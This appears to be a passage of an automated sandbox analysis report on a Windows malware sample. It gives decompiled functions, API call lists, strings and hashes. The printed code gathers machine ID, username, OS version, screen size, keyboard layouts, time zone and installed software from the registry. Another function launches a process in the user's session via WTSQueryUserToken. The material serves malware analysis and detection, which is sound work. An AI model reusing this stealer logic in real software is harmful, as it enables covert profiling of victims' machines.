                                                                                                    0x0041748d
                                                                                                    0x00417490
                                                                                                    0x0041749c
                                                                                                    0x004174a3
                                                                                                    0x004174a8
                                                                                                    0x004174ad
                                                                                                    0x004174b2
                                                                                                    0x004174b5
                                                                                                    0x004174ba
                                                                                                    0x004174c6
                                                                                                    0x004174cd
                                                                                                    0x004174d2
                                                                                                    0x004174d4
                                                                                                    0x004174e5
                                                                                                    0x004174ec
                                                                                                    0x004174f4
                                                                                                    0x004174fe
                                                                                                    0x00417505
                                                                                                    0x00417508
                                                                                                    0x0041750b
                                                                                                    0x00417518
                                                                                                    0x00417525
                                                                                                    0x0041752d
                                                                                                    0x0041753a
                                                                                                    0x00417542
                                                                                                    0x0041754f
                                                                                                    0x0041755c
                                                                                                    0x00417569
                                                                                                    0x0041757b

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                    • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                      • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                    • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C04
                                                                                                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?), ref: 00416C0A
                                                                                                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C32
                                                                                                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001), ref: 00416C38
                                                                                                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000), ref: 00416C77
                                                                                                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?), ref: 00416C7D
                                                                                                    • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                    • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E), ref: 00415F8D
                                                                                                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E), ref: 00416150
                                                                                                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                    • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                    • API String ID: 75899496-943277980
                                                                                                    • Opcode ID: 58f48ea636e9adab74f2cff82e6aa2b28564f4d77c9b80aafec4ee121c4b5d26
                                                                                                    • Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
                                                                                                    • Opcode Fuzzy Hash: 58f48ea636e9adab74f2cff82e6aa2b28564f4d77c9b80aafec4ee121c4b5d26
                                                                                                    • Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041727C Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 43%
                                                                                                    			E0041727C(signed int __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t59;
				intOrPtr* _t141;
				void* _t142;
				intOrPtr _t172;
				void* _t180;
				intOrPtr _t183;
				intOrPtr _t184;

				_t181 = __esi;
				asm("das");
				 *__eax =  *__eax + __eax;
				 *__edx =  *__edx + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax & __eax;
				 *__eax =  *__eax + __eax;
				_t59 = __eax +  *__eax;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 + _t59;
				_t183 = _t184;
				_t142 = 0xc;
				do {
					_push(0);
					_push(0);
					_t142 = _t142 - 1;
					_t189 = _t142;
				} while (_t142 != 0);
				_t141 = _t59;
				_push(_t183);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t184;
				_push("MachineID :   ");
				E00406C4C( &_v8, _t141, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t141);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t141, _t180, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t189);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t141);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v40);
				E004037DC( &_v68, "Screen: ",  *_t141);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t141,  &_v72, __esi, _t189);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t141,  &_v76, _t181, _t189);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v60);
				_push( *_t141);
				_push("Layouts: ");
				E00416FB8( &_v80, _t141, _t180, _t181);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("LocalTime: ");
				E00417198( &_v84, _t141, _t181);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("Zone: ");
				E00417098( &_v88, _t141, _t180, _t181, _t189);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t141);
				E00416748( &_v92, _t141, _t180, _t181);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t141);
				E00416B94( &_v96, _t141, _t180, _t181, _t189);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t141);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t141, _t180, _t181);
				E00403798(_t141, _v100);
				_t172 = 0x4175a8;
				 *[fs:eax] = _t172;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}


































                                                                                                    0x0041727c
                                                                                                    0x0041727c
                                                                                                    0x0041727d
                                                                                                    0x0041727f
                                                                                                    0x00417281
                                                                                                    0x00417283
                                                                                                    0x00417284
                                                                                                    0x00417286
                                                                                                    0x00417288
                                                                                                    0x0041728a
                                                                                                    0x0041728e
                                                                                                    0x00417291
                                                                                                    0x00417293
                                                                                                    0x00417298
                                                                                                    0x00417298
                                                                                                    0x0041729a
                                                                                                    0x0041729c
                                                                                                    0x0041729c
                                                                                                    0x0041729c
                                                                                                    0x004172a0
                                                                                                    0x004172a4
                                                                                                    0x004172a5
                                                                                                    0x004172aa
                                                                                                    0x004172ad
                                                                                                    0x004172b0
                                                                                                    0x004172b8
                                                                                                    0x004172bd
                                                                                                    0x004172c0
                                                                                                    0x004172cc
                                                                                                    0x004172d1
                                                                                                    0x004172d3
                                                                                                    0x004172dd
                                                                                                    0x004172e2
                                                                                                    0x004172e5
                                                                                                    0x004172f1
                                                                                                    0x004172f6
                                                                                                    0x004172f8
                                                                                                    0x00417300
                                                                                                    0x00417305
                                                                                                    0x00417308
                                                                                                    0x00417315
                                                                                                    0x00417320
                                                                                                    0x00417325
                                                                                                    0x0041732b
                                                                                                    0x00417330
                                                                                                    0x00417333
                                                                                                    0x0041733b
                                                                                                    0x00417340
                                                                                                    0x00417343
                                                                                                    0x00417350
                                                                                                    0x0041735a
                                                                                                    0x00417369
                                                                                                    0x00417374
                                                                                                    0x00417379
                                                                                                    0x0041737f
                                                                                                    0x00417384
                                                                                                    0x00417387
                                                                                                    0x0041738f
                                                                                                    0x00417394
                                                                                                    0x00417397
                                                                                                    0x0041739c
                                                                                                    0x004173a9
                                                                                                    0x004173b3
                                                                                                    0x004173c2
                                                                                                    0x004173cd
                                                                                                    0x004173d2
                                                                                                    0x004173df
                                                                                                    0x004173e4
                                                                                                    0x004173e7
                                                                                                    0x004173f6
                                                                                                    0x004173fb
                                                                                                    0x004173fe
                                                                                                    0x0041740b
                                                                                                    0x00417415
                                                                                                    0x0041741a
                                                                                                    0x0041741c
                                                                                                    0x00417424
                                                                                                    0x00417429
                                                                                                    0x0041742c
                                                                                                    0x00417438
                                                                                                    0x0041743d
                                                                                                    0x0041743f
                                                                                                    0x00417447
                                                                                                    0x0041744c
                                                                                                    0x0041744f
                                                                                                    0x0041745b
                                                                                                    0x00417460
                                                                                                    0x00417462
                                                                                                    0x0041746a
                                                                                                    0x0041746f
                                                                                                    0x00417472
                                                                                                    0x0041747e
                                                                                                    0x00417483
                                                                                                    0x00417488
                                                                                                    0x0041748d
                                                                                                    0x00417490
                                                                                                    0x0041749c
                                                                                                    0x004174a3
                                                                                                    0x004174a8
                                                                                                    0x004174ad
                                                                                                    0x004174b2
                                                                                                    0x004174b5
                                                                                                    0x004174ba
                                                                                                    0x004174c6
                                                                                                    0x004174cd
                                                                                                    0x004174d2
                                                                                                    0x004174d4
                                                                                                    0x004174e5
                                                                                                    0x004174ec
                                                                                                    0x004174f4
                                                                                                    0x004174fe
                                                                                                    0x00417505
                                                                                                    0x00417508
                                                                                                    0x0041750b
                                                                                                    0x00417518
                                                                                                    0x00417525
                                                                                                    0x0041752d
                                                                                                    0x0041753a
                                                                                                    0x00417542
                                                                                                    0x0041754f
                                                                                                    0x0041755c
                                                                                                    0x00417569
                                                                                                    0x0041757b

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                    • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                      • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                    • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C04
                                                                                                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?), ref: 00416C0A
                                                                                                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C32
                                                                                                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001), ref: 00416C38
                                                                                                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000), ref: 00416C77
                                                                                                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?), ref: 00416C7D
                                                                                                    • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                    • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E), ref: 00415F8D
                                                                                                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E), ref: 00416150
                                                                                                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                    • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                    • API String ID: 75899496-943277980
                                                                                                    • Opcode ID: 17725f65cc4c1735e4182602efd43c1d89c2794d0dcd42a19e9bfb2a36610cac
                                                                                                    • Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
                                                                                                    • Opcode Fuzzy Hash: 17725f65cc4c1735e4182602efd43c1d89c2794d0dcd42a19e9bfb2a36610cac
                                                                                                    • Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00417290 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 40%
                                                                                                    			E00417290(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t140;
				void* _t141;
				intOrPtr _t171;
				intOrPtr _t182;
				intOrPtr _t183;

				_t180 = __esi;
				_t179 = __edi;
				_t182 = _t183;
				_t141 = 0xc;
				do {
					_push(0);
					_push(0);
					_t141 = _t141 - 1;
					_t184 = _t141;
				} while (_t141 != 0);
				_t140 = __eax;
				_push(_t182);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				_push("MachineID :   ");
				E00406C4C( &_v8, __eax, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t140);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t140, __edi, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t184);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t140);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v40);
				E004037DC( &_v68, "Screen: ",  *_t140);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t140,  &_v72, _t180, _t184);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t140,  &_v76, _t180, _t184);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v60);
				_push( *_t140);
				_push("Layouts: ");
				E00416FB8( &_v80, _t140, __edi, _t180);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("LocalTime: ");
				E00417198( &_v84, _t140, _t180);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("Zone: ");
				E00417098( &_v88, _t140, _t179, _t180, _t184);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t140);
				E00416748( &_v92, _t140, _t179, _t180);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t140);
				E00416B94( &_v96, _t140, _t179, _t180, _t184);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t140);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t140, _t179, _t180);
				E00403798(_t140, _v100);
				_t171 = 0x4175a8;
				 *[fs:eax] = _t171;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}
































                                                                                                    0x00417290
                                                                                                    0x00417290
                                                                                                    0x00417291
                                                                                                    0x00417293
                                                                                                    0x00417298
                                                                                                    0x00417298
                                                                                                    0x0041729a
                                                                                                    0x0041729c
                                                                                                    0x0041729c
                                                                                                    0x0041729c
                                                                                                    0x004172a0
                                                                                                    0x004172a4
                                                                                                    0x004172a5
                                                                                                    0x004172aa
                                                                                                    0x004172ad
                                                                                                    0x004172b0
                                                                                                    0x004172b8
                                                                                                    0x004172bd
                                                                                                    0x004172c0
                                                                                                    0x004172cc
                                                                                                    0x004172d1
                                                                                                    0x004172d3
                                                                                                    0x004172dd
                                                                                                    0x004172e2
                                                                                                    0x004172e5
                                                                                                    0x004172f1
                                                                                                    0x004172f6
                                                                                                    0x004172f8
                                                                                                    0x00417300
                                                                                                    0x00417305
                                                                                                    0x00417308
                                                                                                    0x00417315
                                                                                                    0x00417320
                                                                                                    0x00417325
                                                                                                    0x0041732b
                                                                                                    0x00417330
                                                                                                    0x00417333
                                                                                                    0x0041733b
                                                                                                    0x00417340
                                                                                                    0x00417343
                                                                                                    0x00417350
                                                                                                    0x0041735a
                                                                                                    0x00417369
                                                                                                    0x00417374
                                                                                                    0x00417379
                                                                                                    0x0041737f
                                                                                                    0x00417384
                                                                                                    0x00417387
                                                                                                    0x0041738f
                                                                                                    0x00417394
                                                                                                    0x00417397
                                                                                                    0x0041739c
                                                                                                    0x004173a9
                                                                                                    0x004173b3
                                                                                                    0x004173c2
                                                                                                    0x004173cd
                                                                                                    0x004173d2
                                                                                                    0x004173df
                                                                                                    0x004173e4
                                                                                                    0x004173e7
                                                                                                    0x004173f6
                                                                                                    0x004173fb
                                                                                                    0x004173fe
                                                                                                    0x0041740b
                                                                                                    0x00417415
                                                                                                    0x0041741a
                                                                                                    0x0041741c
                                                                                                    0x00417424
                                                                                                    0x00417429
                                                                                                    0x0041742c
                                                                                                    0x00417438
                                                                                                    0x0041743d
                                                                                                    0x0041743f
                                                                                                    0x00417447
                                                                                                    0x0041744c
                                                                                                    0x0041744f
                                                                                                    0x0041745b
                                                                                                    0x00417460
                                                                                                    0x00417462
                                                                                                    0x0041746a
                                                                                                    0x0041746f
                                                                                                    0x00417472
                                                                                                    0x0041747e
                                                                                                    0x00417483
                                                                                                    0x00417488
                                                                                                    0x0041748d
                                                                                                    0x00417490
                                                                                                    0x0041749c
                                                                                                    0x004174a3
                                                                                                    0x004174a8
                                                                                                    0x004174ad
                                                                                                    0x004174b2
                                                                                                    0x004174b5
                                                                                                    0x004174ba
                                                                                                    0x004174c6
                                                                                                    0x004174cd
                                                                                                    0x004174d2
                                                                                                    0x004174d4
                                                                                                    0x004174e5
                                                                                                    0x004174ec
                                                                                                    0x004174f4
                                                                                                    0x004174fe
                                                                                                    0x00417505
                                                                                                    0x00417508
                                                                                                    0x0041750b
                                                                                                    0x00417518
                                                                                                    0x00417525
                                                                                                    0x0041752d
                                                                                                    0x0041753a
                                                                                                    0x00417542
                                                                                                    0x0041754f
                                                                                                    0x0041755c
                                                                                                    0x00417569
                                                                                                    0x0041757b

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                    • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                      • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                    • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C04
                                                                                                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?), ref: 00416C0A
                                                                                                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C32
                                                                                                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001), ref: 00416C38
                                                                                                      • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000), ref: 00416C77
                                                                                                      • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?), ref: 00416C7D
                                                                                                    • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                    • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E), ref: 00415F8D
                                                                                                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E), ref: 00416150
                                                                                                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                    • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                    • API String ID: 75899496-943277980
                                                                                                    • Opcode ID: f4a320fc65cbdb4cb838666442c70b6f53f3e824657c5935ffb89e30a1f9f270
                                                                                                    • Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
                                                                                                    • Opcode Fuzzy Hash: f4a320fc65cbdb4cb838666442c70b6f53f3e824657c5935ffb89e30a1f9f270
                                                                                                    • Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407DD0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 100libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 49%
                                                                                                    			E00407DD0(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				intOrPtr* _t61;
				intOrPtr _t74;
				intOrPtr* _t76;
				void* _t79;
				void* _t81;

				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_v112 = 0;
				_v12 = 0;
				_v20 = 0;
				 *[fs:eax] = _t81 + 0xffffff98;
				_t28 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
				_t30 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
				_t76 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
				E00402754(0,  &_v112);
				E00403D2C( &_v20, _v112);
				E00404F00();
				_v108 = 0x44;
				_v100 = 0;
				 *_t28( *[fs:eax], 0x407eea, _t81, __edi, __esi, __ebx, _t79, __ebx);
				_push( &_v16);
				_push(0);
				if( *_t30() != 0) {
					 *_t76( &_v20, _v12, 0xffffffff);
					_t61 =  *0x41b5e8; // 0x41c728
					 *((intOrPtr*)( *_t61))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
					asm("sbb eax, eax");
				}
				_pop(_t74);
				 *[fs:eax] = _t74;
				_push(E00407EF1);
				E004034E4( &_v108);
				E00403B80( &_v16);
				return E00403B80( &_v8);
			}




















                                                                                                    0x00407dd1
                                                                                                    0x00407dd3
                                                                                                    0x00407ddf
                                                                                                    0x00407de2
                                                                                                    0x00407de5
                                                                                                    0x00407df3
                                                                                                    0x00407e06
                                                                                                    0x00407e1d
                                                                                                    0x00407e39
                                                                                                    0x00407e40
                                                                                                    0x00407e4b
                                                                                                    0x00407e58
                                                                                                    0x00407e5d
                                                                                                    0x00407e66
                                                                                                    0x00407e69
                                                                                                    0x00407e70
                                                                                                    0x00407e71
                                                                                                    0x00407e76
                                                                                                    0x00407e82
                                                                                                    0x00407eb3
                                                                                                    0x00407eba
                                                                                                    0x00407ebf
                                                                                                    0x00407ec2
                                                                                                    0x00407ec6
                                                                                                    0x00407ec9
                                                                                                    0x00407ecc
                                                                                                    0x00407ed4
                                                                                                    0x00407edc
                                                                                                    0x00407ee9

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00407E00
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E06
                                                                                                    • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 00407E17
                                                                                                    • GetProcAddress.KERNEL32(00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E1D
                                                                                                    • LoadLibraryA.KERNEL32(userenv.dll), ref: 00407E2E
                                                                                                    • GetProcAddress.KERNEL32(00000000,userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E34
